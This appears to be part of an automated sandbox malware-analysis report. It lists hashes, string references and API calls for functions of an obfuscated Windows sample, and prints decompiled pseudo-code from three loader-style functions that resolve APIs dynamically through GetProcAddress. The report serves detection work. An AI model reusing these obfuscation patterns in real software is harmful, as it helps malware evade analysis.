String ID: GetDlgItem$GetThreadWaitChain$WmiApSrv.exe$bridgeunattend.exe$dT3$dispex.dll$dwmcore.dll
API String ID: 514040917-4016093598
Opcode ID: a16203ece9803e87b13724324bf83162a62ad54d639b6b7c10b2f6d2e8240fbc
Instruction ID: 65b43bd16c91bce8eb381636c0a93b0aee74ff1fa4fe2e4eece733cde7092613
Opcode Fuzzy Hash: a16203ece9803e87b13724324bf83162a62ad54d639b6b7c10b2f6d2e8240fbc
Instruction Fuzzy Hash: 5EC1E075E547068FCB00DFB8E8C05CEBBB2EB29321F44917AC944E7B51E6341A86CB55

Uniqueness

Uniqueness Score: -1.00%

Function 005E908C Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 005E92BC

Strings

GetProcessorSystemCycleTime, xrefs: 005E92DA, 005E93CF
E , xrefs: 005E90CE
dispex.dll, xrefs: 005E94F4
RtlIpv4StringToAddressW, xrefs: 005E913D, 005E93B1
Policy.6.0.Microsoft.Ink.dll, xrefs: 005E92E7, 005E93DC
api-ms-win-core-processthreads-l1-1-0.dll, xrefs: 005E90F3
sbeio.dll, xrefs: 005E920A

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: E $GetProcessorSystemCycleTime$Policy.6.0.Microsoft.Ink.dll$RtlIpv4StringToAddressW$api-ms-win-core-processthreads-l1-1-0.dll$dispex.dll$sbeio.dll
API String ID: 190572456-3384909273
Opcode ID: f50ba35fab8e3971a27dc8268c5f034034e68aee6d3a2a53e09bd3dacbaaa5d2
Instruction ID: 179c55858f9196ce01c522bfc02a3da5c2b57503f3185fdada3613c2e90c6848
Opcode Fuzzy Hash: f50ba35fab8e3971a27dc8268c5f034034e68aee6d3a2a53e09bd3dacbaaa5d2
Instruction Fuzzy Hash: F5B1F2B5A047468FCB04DFB9EC942D97FB3FB28312F04112AC885E7B61E6340A45C786

Uniqueness

Uniqueness Score: -1.00%

Function 005CD63A Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 250
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E005CD63A() {
				intOrPtr _t55;
				_Unknown_base(*)()* _t56;
				_Unknown_base(*)()* _t58;
				_Unknown_base(*)()* _t63;
				_Unknown_base(*)()* _t68;
				_Unknown_base(*)()* _t71;
				_Unknown_base(*)()* _t79;
				_Unknown_base(*)()* _t81;
				_Unknown_base(*)()* _t93;
				char* _t107;
				char* _t124;
				char* _t127;
				short _t136;
				short _t139;
				intOrPtr _t142;
				short _t144;
				short _t154;
				short _t155;
				short _t156;
				void* _t167;
				void* _t168;
				void* _t170;
				void* _t175;
				void* _t176;
				void* _t178;

				if(_t167 == 0x4a7) {
					L3:
					 *0x6581e6 = _t154;
					L4:
					_t155 = _t154 - 0x98abfc;
					_t56 =  *(_t178 - 8);
					_push( *0x6583c1);
					_t168 = _t167;
					 *(_t178 - 8) = _t56;
					if(_t56 > 0x16108e) {
						L13:
						 *((intOrPtr*)(_t178 - 0x1c)) =  *((intOrPtr*)(_t178 - 0x1c)) + _t136;
						_t136 = 0x7842;
						 *0x659859 =  *0x659859 - _t155;
						L14:
						 *0x6581de = _t155;
						L15:
						_t156 = _t155 - 0x9fae;
						 *0x658264 =  *0x658264 - 0xa791;
						_t58 = GetProcAddress(??, ??);
						 *(_t178 - 8) = _t58;
						_t63 =  *(_t178 - 8);
						_t107 =  !(_t102 - _t58 + _t102 - _t58) +  !(_t102 - _t58 + _t102 - _t58);
						 *(_t178 - 8) = _t63;
						if(_t63 >= 0x158d66) {
							if(_t63 >= 0x23b1ea) {
								 *(_t178 - 0x14) =  &(( *(_t178 - 0x14))[_t107]);
								 *(_t178 - 0x14) = _t107;
							}
							 *0x658154 =  *0x658154 + 0x5efd;
							 *0x65afcf =  *0x65afcf - 0x5efd;
							_t136 = 0xbdfa;
							_t156 = _t156 - 0x788d05;
						}
						 *0x65822c = _t156;
						_t68 =  *(_t178 - 8);
						 *0x6597fd = _t68;
						if(_t136 < _t136) {
							_t136 = _t136 + 1;
						}
						 *0x658190 = _t136;
						_t158 = 0x9845;
						 *(_t178 - 8) = _t68;
						 *((intOrPtr*)(_t178 - 0xc)) =  *((intOrPtr*)(_t178 - 0xc));
						 *(_t178 - 0x10) = 0;
						_push(0);
						 *(_t178 - 0x10) = 0xffffffffffaf118e;
						_t113 = 0xffffffffffffba48;
						_t71 =  *(_t178 - 8);
						 *((intOrPtr*)(_t178 - 0x18)) = 0;
						if(_t136 < _t136) {
							_t136 = 0x7ce9;
							 *0x6581b6 = 0x9845;
							_t158 =  *0x658208; // 0x8bc4
							 *0x65afd5 =  *0x65afd5 - _t71;
							 *0x658258 =  *0x658258 + 0xffffffffffffffff;
							if(0 != 0) {
								 *0x65ac66 =  *0x65ac66;
							}
							_t113 = "NetMessageNameGetInfo";
						}
						 *0x65804c =  *0x65804c - _t71;
						_t139 = _t113 - _t71 + 0x2a4104;
						 *0x658186 = _t139;
						 *0x658228 = _t158 - 0x90;
						_t175 = 0xa27769;
						 *0x65afd8 =  *0x65afd8 + _t71;
						 *0x65afd9 = _t71;
						_push( *0x65824e);
						 *(_t178 - 8) = _t71;
						 *(_t178 - 0x14) = "GetThreadWaitChain";
						 *(_t178 - 0x10) = 0;
						 *0x65815c = _t139 - 0x6864;
						_t142 =  *0x658190; // 0x475c
						 *0x6581e0 = 0xffffffffffffffff;
						 *0x6581fc = 0xffffffffffffffff;
						_t123 = 0x4247c3 + 0x4247c3;
						L005B1BC0(0x4247c3, 0x848f86, _t142, 0xffffffffffffffff, 0, 0xa27769, 1, 0x848f86, 1);
						_t79 =  *(_t178 - 8);
						if(0 <= 0) {
							_t123 = 0x848f86 + _t142;
							 *0x6581b0 = 0xffffffffffffffff;
							 *0x65afd6 = _t79;
						}
						_t176 = _t175 - 0xad4929;
						_t124 = _t123 + 0xcc;
						 *(_t178 - 8) = _t79;
						_push(1);
						E005B4611();
						_t81 =  *(_t178 - 8);
						_push( *0x6580f0);
						_t144 = "bridgeunattend.exe" + 0x76;
						 *(_t178 - 8) = _t81;
						if(_t81 < 0x16e3) {
							_t127 =  *(_t178 - 0x10);
							 *0x65afca =  *0x65afca - _t127;
							 *0x6580e6 =  *0x6580e6 + _t127;
							_t124 =  &(_t127[_t127]);
						}
						L005B508F(_t124, _t144, 0, _t176);
						 *0x658184 = _t144;
						_push( *0x65803e);
						 *(_t178 - 0x14) =  *(_t178 - 0x14) - _t124;
						 *0x65818a =  *0x65818a - 0x6fb4;
						_push( *0x6580f4);
						_t93 =  *(_t178 - 8);
						 *0x65afc9 =  *0x65afc9 +  !0x3ba1dd;
						 *(_t178 - 8) = _t93;
						_push(_t93);
						_push(1);
						_push(_t93);
						_push(0x5cd9f1);
						goto __eax;
					}
					_t102 = 0x325997;
					if(0x325997 != 0x325997) {
						goto L14;
					}
					_t102 = 0x21016;
					if(0x21016 != _t136) {
						L9:
						 *0x658296 =  *0x658296 + _t170 - 0xbe2c;
						if(_t168 < 0) {
							if(0xcb5f92 > 0) {
								 *0x65afc6 = 0xcb5f92;
							}
						}
						goto L13;
					}
					_t136 = 0x6772;
					if(0x6772 < 0x6772) {
						goto L15;
					}
					 *0x65818a = 0x6772;
					 *0x659a99 =  *0x659a99;
					 *0x65822c = 0x8ede;
					_t155 = 0 - _t170;
					goto L9;
				}
				 *0x658551 = _t55;
				 *(_t178 - 0x10) = _t102;
				_t102 = "SMSvcHost.exe";
				if(_t136 != _t136) {
					goto L4;
				} else {
					_t136 = 0x658198;
					goto L3;
				}
			}

0x005cd63f
0x005cd666
0x005cd666
0x005cd670
0x005cd670
0x005cd676
0x005cd679
0x005cd67f
0x005cd681
0x005cd689
0x005cd6f7
0x005cd6f7
0x005cd6fe
0x005cd702
0x005cd708
0x005cd708
0x005cd70f
0x005cd70f
0x005cd718
0x005cd727
0x005cd731
0x005cd74a
0x005cd74f
0x005cd751
0x005cd759
0x005cd760
0x005cd766
0x005cd769
0x005cd769
0x005cd772
0x005cd779
0x005cd77f
0x005cd781
0x005cd781
0x005cd787
0x005cd79e
0x005cd7a1
0x005cd7aa
0x005cd7ac
0x005cd7ac
0x005cd7ad
0x005cd7be
0x005cd7c2
0x005cd7c5
0x005cd7cb
0x005cd7d7
0x005cd7e4
0x005cd7e9
0x005cd7ee
0x005cd7f1
0x005cd7f6
0x005cd801
0x005cd805
0x005cd812
0x005cd819
0x005cd81f
0x005cd830
0x005cd832
0x005cd832
0x005cd846
0x005cd846
0x005cd84b
0x005cd85a
0x005cd85c
0x005cd869
0x005cd873
0x005cd879
0x005cd87f
0x005cd885
0x005cd88c
0x005cd89b
0x005cd8b6
0x005cd8c5
0x005cd8d2
0x005cd8d9
0x005cd8e0
0x005cd8ec
0x005cd8f4
0x005cd8f9
0x005cd8ff
0x005cd901
0x005cd90e
0x005cd91d
0x005cd91d
0x005cd923
0x005cd929
0x005cd92c
0x005cd931
0x005cd933
0x005cd938
0x005cd93b
0x005cd94a
0x005cd94d
0x005cd954
0x005cd958
0x005cd95b
0x005cd961
0x005cd968
0x005cd968
0x005cd96a
0x005cd972
0x005cd983
0x005cd98a
0x005cd99a
0x005cd9b3
0x005cd9d5
0x005cd9d8
0x005cd9de
0x005cd9e1
0x005cd9e2
0x005cd9e4
0x005cd9e5
0x005cd9ef
0x005cd9ef
0x005cd691
0x005cd699
0x00000000
0x00000000
0x005cd69b
0x005cd6a4
0x005cd6ca
0x005cd6cf
0x005cd6db
0x005cd6df
0x005cd6e1
0x005cd6eb
0x005cd6f0
0x00000000
0x005cd6db
0x005cd6a6
0x005cd6ac
0x00000000
0x00000000
0x005cd6ae
0x005cd6bb
0x005cd6c1
0x005cd6c8
0x00000000
0x005cd6c8
0x005cd641
0x005cd646
0x005cd654
0x005cd65b
0x00000000
0x005cd65d
0x005cd660
0x00000000
0x005cd660

APIs

GetProcAddress.KERNEL32 ref: 005CD727

Strings

CreateDisc.dll, xrefs: 005CD6F0
GetProcessorSystemCycleTime, xrefs: 005CD7DF
bridgeunattend.exe, xrefs: 005CD942
NetMessageNameGetInfo, xrefs: 005CD846
GetThreadWaitChain, xrefs: 005CD896, 005CD8F1
SMSvcHost.exe, xrefs: 005CD654

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: CreateDisc.dll$GetProcessorSystemCycleTime$GetThreadWaitChain$NetMessageNameGetInfo$SMSvcHost.exe$bridgeunattend.exe
API String ID: 190572456-1894967855
Opcode ID: fee9498c0b5c9708039bd5cdd6db0c35a249c98f020cb7810d83715a4957c5cb
Instruction ID: 905616726eccc22b23f6526bcc58bf2dae70a2e28049cd5f5c1cc3460dd9b980
Opcode Fuzzy Hash: fee9498c0b5c9708039bd5cdd6db0c35a249c98f020cb7810d83715a4957c5cb
Instruction Fuzzy Hash: 1AA1CC75A107069FCB00EFB9EC946D97FB2FB28322F04612AD845E7B61E7350685CB51

Uniqueness

Uniqueness Score: -1.00%

Function 005F7090 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E005F7090() {
				char* _t44;
				char* _t46;
				char* _t53;
				char* _t54;
				char* _t56;
				char* _t65;
				intOrPtr _t67;
				void* _t70;
				short _t94;
				char** _t97;
				short _t102;
				void* _t103;
				intOrPtr _t105;
				intOrPtr _t111;
				signed char _t112;
				char* _t114;
				char* _t115;
				void* _t116;
				void* _t118;

				asm("sbb eax, 0x6580fc");
				 *((intOrPtr*)(_t118 - 0x18)) = _t67;
				_t114 =  *( *(_t118 - 0xc));
				 *(_t118 - 8) = _t114;
				 *(_t118 - 0x10) =  &(( *(_t118 - 0x10))[_t67]);
				_t70 =  *((intOrPtr*)(_t118 - 0x14)) - 0x45d0;
				 *0x658138 = _t94;
				L005B1BC0(0x2253ec, _t70, _t94, _t103, _t114, _t116, 0, _t94, 0);
				_t44 =  *(_t118 - 8);
				_t105 =  *0x65820a; // 0x8d47
				 *0x65afd6 = _t44;
				 *(_t118 - 8) = _t44;
				_t46 =  *(_t118 - 8);
				 *0x6580ce =  *0x6580ce - _t70 + 0x2a560e;
				 *(_t118 - 0x64) = _t46;
				 *0x65afd1 =  *0x65afd1 - _t105;
				 *(_t118 - 8) = _t46;
				_t97 =  *0x658140; // 0x701d
				 *0x658174 =  *0x658174 - _t97;
				 *((intOrPtr*)(_t118 - 0x24)) =  *((intOrPtr*)(_t118 - 0x24)) + _t97;
				_push( *(_t118 - 0x64));
				 *0x659771 =  *0x659771 + _t97;
				_t111 =  *0x658200; // 0x93ff
				_t112 = _t111 - 0xa9a6;
				 *0x658250 =  *0x658250;
				_t53 =  *(_t118 - 8);
				if( !("rpcref.dll") <  !("rpcref.dll")) {
					_t102 = _t97 - 0x5d;
					 *0x65817e = _t102;
					_t97 = _t102 - 0x85;
				}
				if((_t112 & 0x0000930a) < 0) {
					 *0x658202 = _t112;
					 *0x65afd9 = _t53;
				}
				_t54 = GetSidSubAuthorityCount();
				if((_t112 & 0x000000a6) == 0) {
					 *0x65afd5 =  *0x65afd5 + _t54;
					 *0x65afd6 = _t54;
				}
				 *0x658725 =  *0x658725 + _t114;
				_t115 =  &(_t114[0xe0bdc0]);
				if(_t54 < 0x149c1f) {
					 *0x65afd0 =  *0x65afd0 - 0x6db5;
					_t97 = 0;
				}
				 *(_t118 - 8) = _t54;
				_t56 =  *(_t118 - 8);
				 *(_t118 - 0x10) = _t56;
				 *(_t118 - 0x5c) = _t56;
				 *(_t118 - 8) = _t56;
				L005B508F(0, _t97, _t115, 0);
				 *(_t118 - 0x10) = 0;
				 *(_t118 - 0xc) = 0;
				 *0x6580c4 =  *0x6580c4 + "RtlIpv4StringToAddressW";
				_t65 =  *( *(_t118 - 8));
				 *(_t118 - 8) = _t65;
				_push(_t65);
				_push(1);
				_push(_t65);
				_push(0x5f7281);
				goto __eax;
			}

0x005f7090
0x005f7095
0x005f709b
0x005f70a2
0x005f70aa
0x005f70b5
0x005f70b7
0x005f70c3
0x005f70ce
0x005f70da
0x005f70e1
0x005f70ea
0x005f70f0
0x005f70f9
0x005f7100
0x005f710d
0x005f711c
0x005f7131
0x005f7138
0x005f713f
0x005f714d
0x005f7150
0x005f715d
0x005f7164
0x005f7169
0x005f717a
0x005f7182
0x005f7184
0x005f7187
0x005f7191
0x005f7191
0x005f7199
0x005f719b
0x005f71a8
0x005f71a8
0x005f71b0
0x005f71b9
0x005f71bb
0x005f71c1
0x005f71c1
0x005f71d1
0x005f71da
0x005f71e6
0x005f7200
0x005f7206
0x005f7206
0x005f7209
0x005f7210
0x005f7213
0x005f7218
0x005f721b
0x005f7221
0x005f7229
0x005f7234
0x005f7258
0x005f726c
0x005f726e
0x005f7271
0x005f7272
0x005f7274
0x005f7275
0x005f727f

APIs

GetSidSubAuthorityCount.ADVAPI32(?,00000000,?,00000000), ref: 005F71B0

Strings

rpcref.dll, xrefs: 005F712A, 005F723D
(0, xrefs: 005F71ED
RtlIpv4StringToAddressW, xrefs: 005F7253, 005F7271, 005F7274
dwmcore.dll, xrefs: 005F711F, 005F722F
d3d10core.dll, xrefs: 005F71F2
S", xrefs: 005F70A5

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AuthorityCount
String ID: (0$RtlIpv4StringToAddressW$d3d10core.dll$dwmcore.dll$rpcref.dll$S"
API String ID: 3768604245-1742791895
Opcode ID: efe285d635375c095070af20442e6913500d41c6ca731f8210d90ecbe23c29bd
Instruction ID: 579bb7d20e9ebeb61bd81bb6d71b89ffed28912483a1d9b6a54ac841696b3193
Opcode Fuzzy Hash: efe285d635375c095070af20442e6913500d41c6ca731f8210d90ecbe23c29bd
Instruction Fuzzy Hash: 07515375A1070A9FCB00DFB8D8956DDBFF2FB28322F44526AD944E7762E6744A44CB01

Uniqueness

Uniqueness Score: -1.00%

Function 005D13E7 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 005D143E

Strings

srcore.dll, xrefs: 005D14CB
GetProcessorSystemCycleTime, xrefs: 005D1500
bridgeunattend.exe, xrefs: 005D13EC
NetMessageNameGetInfo, xrefs: 005D1543
findnetprinters.dll, xrefs: 005D147E
api-ms-win-core-processthreads-l1-1-0.dll, xrefs: 005D1569

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: GetProcessorSystemCycleTime$NetMessageNameGetInfo$api-ms-win-core-processthreads-l1-1-0.dll$bridgeunattend.exe$findnetprinters.dll$srcore.dll
API String ID: 190572456-3596234729
Opcode ID: eef93e0b97618f9d0f637f3335d4e517055ae86b3c959cd0909b9567acd511d7
Instruction ID: a2a6f9f80abd115a36ba5bd0d443ba2939a0afe8b57817b8e6cfc170837b8586
Opcode Fuzzy Hash: eef93e0b97618f9d0f637f3335d4e517055ae86b3c959cd0909b9567acd511d7
Instruction Fuzzy Hash: F341F4B5E00B069FCB20DFBCEC942E93FB2FB69322F04522AC8419B761E6350545C745

Uniqueness

Uniqueness Score: -1.00%

Function 005DB08F Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 005DB181

Strings

api-ms-win-core-memory-l1-1-0.dll, xrefs: 005DB193
dispex.dll, xrefs: 005DB132
RtlIpv4StringToAddressW, xrefs: 005DB0A0
ehui.dll, xrefs: 005DB1E7
NtCreateJobObject, xrefs: 005DB14F
IEShims.dll, xrefs: 005DB0B4, 005DB145

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: IEShims.dll$NtCreateJobObject$RtlIpv4StringToAddressW$api-ms-win-core-memory-l1-1-0.dll$dispex.dll$ehui.dll
API String ID: 190572456-366388942
Opcode ID: ebb8495588688605e1df33ccc6b97120f55522e1a41bfc3db30ba631cfabe608
Instruction ID: da4d895184ea5e1c3e9b3cb2d9f34aaf943524630094031b50b0dc9a8c603bb5
Opcode Fuzzy Hash: ebb8495588688605e1df33ccc6b97120f55522e1a41bfc3db30ba631cfabe608
Instruction Fuzzy Hash: 7F412279A4030A9FCB10CFEDD8C46CDBFB2FB29311F54416AA844EB710E6705A898B41

Uniqueness

Uniqueness Score: -1.00%

Function 005CB36D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 005CB3DC

Strings

WmiApSrv.exe, xrefs: 005CB3E8, 005CB539
Heap32ListNext, xrefs: 005CB443, 005CB47A
ehui.dll, xrefs: 005CB400
findnetprinters.dll, xrefs: 005CB40F
=@ , xrefs: 005CB57E

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: =@ $Heap32ListNext$WmiApSrv.exe$ehui.dll$findnetprinters.dll
API String ID: 190572456-2812878129
Opcode ID: 6bd4ae3a73fd963c9135aa22882beba0a61ca13817c1b91acc3bfef1d38fb00c
Instruction ID: af399773b20d8a1c351eae364cfe7a711b9318cada8f89aa1120f6a17a818ef2
Opcode Fuzzy Hash: 6bd4ae3a73fd963c9135aa22882beba0a61ca13817c1b91acc3bfef1d38fb00c
Instruction Fuzzy Hash: 0051EF76A40B468FCB00DFF8ECA56C93FB3FB29312F446229C845E7B61E6640945C782

Uniqueness

Uniqueness Score: -1.00%

Function 005F65B0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

z, xrefs: 005F662E
dispex.dll, xrefs: 005F6690
WmiApSrv.exe, xrefs: 005F661F
IEShims.dll, xrefs: 005F65CC, 005F66D7
LdrHotPatchRoutine, xrefs: 005F6643

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: IEShims.dll$LdrHotPatchRoutine$WmiApSrv.exe$dispex.dll$z
API String ID: 0-3180835434
Opcode ID: fd75f7f7b9c815f7ed00bed871e79ca6f3979eb8596c5a6a1c2c8963982e1f79
Instruction ID: 36fb3d77b3d5c48f2e75a7dde17992593b7254a485987d8d3bce2c6105cf626f
Opcode Fuzzy Hash: fd75f7f7b9c815f7ed00bed871e79ca6f3979eb8596c5a6a1c2c8963982e1f79
Instruction Fuzzy Hash: 3461DAB1A1070ACFCB01EFF9E8956EDBFB2FB29311F04506AC945A7711E2780A45CB45

Uniqueness

Uniqueness Score: -1.00%

Function 005E668F Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 005E679B

Strings

CreateDisc.dll, xrefs: 005E6824
srcore.dll, xrefs: 005E6970
ehui.dll, xrefs: 005E687B
IEShims.dll, xrefs: 005E670F, 005E695E

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: CreateDisc.dll$IEShims.dll$ehui.dll$srcore.dll
API String ID: 190572456-580662138
Opcode ID: e36cf17c2b985fb3ecd81158310c430b930c72fe8ffc4b98dafafc53d69fa756
Instruction ID: ba6ff7e73d62670d9676d78a638eef3592501cdf12a254b35e508a31fc50a938
Opcode Fuzzy Hash: e36cf17c2b985fb3ecd81158310c430b930c72fe8ffc4b98dafafc53d69fa756
Instruction Fuzzy Hash: B971F1B2A14786CFCB01DFB9EC941CD7FB2EB39352F046269D884A7761E2340A45CB56

Uniqueness

Uniqueness Score: -1.00%

Function 005F143A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 005F1531

Strings

ehui.dll, xrefs: 005F15C2
IEShims.dll, xrefs: 005F144E
LdrHotPatchRoutine, xrefs: 005F1620
VarFormatDateTime, xrefs: 005F147A

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: IEShims.dll$LdrHotPatchRoutine$VarFormatDateTime$ehui.dll
API String ID: 190572456-1807151268
Opcode ID: 0e7253847e023d5aa319bebba01a2dce29c2b5678cf00b985712ba1cdbdb84ae
Instruction ID: 1ed4fbed917da286101b928f47fe4d7cca44ec6b3285ad40ff3b8e306063b572
Opcode Fuzzy Hash: 0e7253847e023d5aa319bebba01a2dce29c2b5678cf00b985712ba1cdbdb84ae
Instruction Fuzzy Hash: 8351E074A10B0ACFCB00DFB8E8C42ED3FB2FB29320F146169C941A7752E6380545CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0064851F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 006485BE

Strings

rpcref.dll, xrefs: 00648634
[(), xrefs: 00648686
ehui.dll, xrefs: 006486B5
dwmcore.dll, xrefs: 006485D7

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: CreateFile
String ID: [()$dwmcore.dll$ehui.dll$rpcref.dll
API String ID: 823142352-2496700145
Opcode ID: 6f79c6ec3592cbdcc656919aeb5f5a3eaa682e274ae9370cdf30dbc827b84769
Instruction ID: 96ae1ac83d400f62700d497f814174214c6476e1ea12666243e684443e66b35d
Opcode Fuzzy Hash: 6f79c6ec3592cbdcc656919aeb5f5a3eaa682e274ae9370cdf30dbc827b84769
Instruction Fuzzy Hash: 30413571A507429FC740EFF8EC957C93FB3EB28322F04522AD941A7BA2EA700945C742

Uniqueness

Uniqueness Score: -1.00%

Function 005EC123 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 113
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E005EC123() {
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t31;
				_Unknown_base(*)()* _t34;
				void* _t36;
				intOrPtr _t48;
				intOrPtr _t60;
				void* _t61;
				signed short _t68;
				signed int _t69;
				intOrPtr _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				short _t77;
				intOrPtr _t78;
				void* _t79;
				void* _t80;

				_t25 =  *(_t80 - 8);
				if(_t36 <= _t36) {
					L5:
					 *0x65a7b9 =  *0x65a7b9 - _t75;
					_t75 = _t75 ^ 0x0000d680;
					L6:
					 *0x65afdc = _t25;
					 *0x6583d5 = _t25;
					_push( *((intOrPtr*)(_t80 - 0x48)));
					 *(_t80 - 8) = _t25;
					_t28 =  *(_t80 - 8);
					if(_t60 < _t60) {
						 *0x65978d =  *0x65978d - _t60;
					}
					 *0x6581e6 = _t68;
					_t69 =  *0x65821e; // 0xe2a6
					 *0x65afd6 = _t28;
					_t77 = _t75 + _t75 + 0xd1c0;
					_push( *0x658529);
					_t74 = _t73 ^ 0x00cb336a;
					 *(_t80 - 8) = _t28;
					_t30 =  *(_t80 - 8);
					 *((intOrPtr*)(_t80 - 0x10)) = 0xf6;
					if(0xf6 != 0x3f) {
						 *((intOrPtr*)(_t80 - 0x1c)) =  *((intOrPtr*)(_t80 - 0x1c)) - 0x5d93;
						_t60 = 0x5d0c;
						 *0x6581ec = _t69;
						if((_t69 & 0x009aa379) <= 0) {
							 *0x65afd8 = _t30;
						}
						 *0x65afdc = _t30;
					}
					_t61 = _t60 + _t60;
					 *0x6581a2 =  *0x6581a2 - _t69;
					_t71 =  *0x6581f0; // 0x8c6c
					_t72 = _t71 - 1;
					 *0x658242 = _t77;
					 *0x65afd6 = _t30;
					_t31 = GetProcAddress(??, ??);
					 *0x659a9d =  *0x659a9d + _t71 - 1;
					_t78 =  *0x658246; // 0x45
					 *0x65a563 =  *0x65a563 - _t78;
					 *0x65a7a5 =  *0x65a7a5 + _t78;
					_t79 = _t78 + _t78;
					if(_t31 > 0) {
						 *0x658747 =  *0x658747 + _t74;
						_t74 = _t74 & 0x00000218;
					}
					 *(_t80 - 0xc) = _t31;
					_t48 =  *((intOrPtr*)(_t80 - 0x14));
					E005B359F(_t48, _t61, _t72, _t74, _t79, _t48, 1);
					_t34 =  *(_t80 - 0xc);
					 *(_t80 - 8) = _t34;
					if(_t34 != 0x1b) {
						 *((intOrPtr*)(_t80 - 0x14)) =  *((intOrPtr*)(_t80 - 0x14)) + _t48 - 1;
					}
					_push(0);
					_push(0);
					_push(E005EC2EE);
					goto __ecx;
				}
				if(_t36 <= _t36) {
					 *0x658174 = _t60 - 0x603c;
					_t60 =  *0x6581a6; // 0x6f71
					_t68 = 0x87a8;
				}
				if((_t68 & 0x0000976d) >= 0) {
					goto L6;
				} else {
					 *0x658210 = _t68;
					_t68 = _t68 + 0xaf14;
					goto L5;
				}
			}

0x005ec127
0x005ec12d
0x005ec160
0x005ec160
0x005ec166
0x005ec172
0x005ec172
0x005ec177
0x005ec17c
0x005ec17f
0x005ec197
0x005ec19f
0x005ec1a1
0x005ec1a1
0x005ec1a7
0x005ec1b1
0x005ec1ba
0x005ec1c2
0x005ec1c7
0x005ec1cd
0x005ec1d5
0x005ec1dc
0x005ec1df
0x005ec1e5
0x005ec1ee
0x005ec1f7
0x005ec1fa
0x005ec20a
0x005ec20c
0x005ec218
0x005ec220
0x005ec22c
0x005ec240
0x005ec243
0x005ec250
0x005ec257
0x005ec258
0x005ec25f
0x005ec267
0x005ec26d
0x005ec276
0x005ec27d
0x005ec283
0x005ec289
0x005ec28e
0x005ec290
0x005ec297
0x005ec29f
0x005ec2a4
0x005ec2ac
0x005ec2b2
0x005ec2b7
0x005ec2c4
0x005ec2c9
0x005ec2cf
0x005ec2d2
0x005ec2de
0x005ec2e0
0x005ec2e2
0x005ec2ec
0x005ec2ec
0x005ec131
0x005ec138
0x005ec13f
0x005ec146
0x005ec146
0x005ec14f
0x00000000
0x005ec151
0x005ec151
0x005ec158
0x00000000
0x005ec15d

APIs

GetProcAddress.KERNEL32(?), ref: 005EC267

Strings

GetProcessorSystemCycleTime, xrefs: 005EC22C
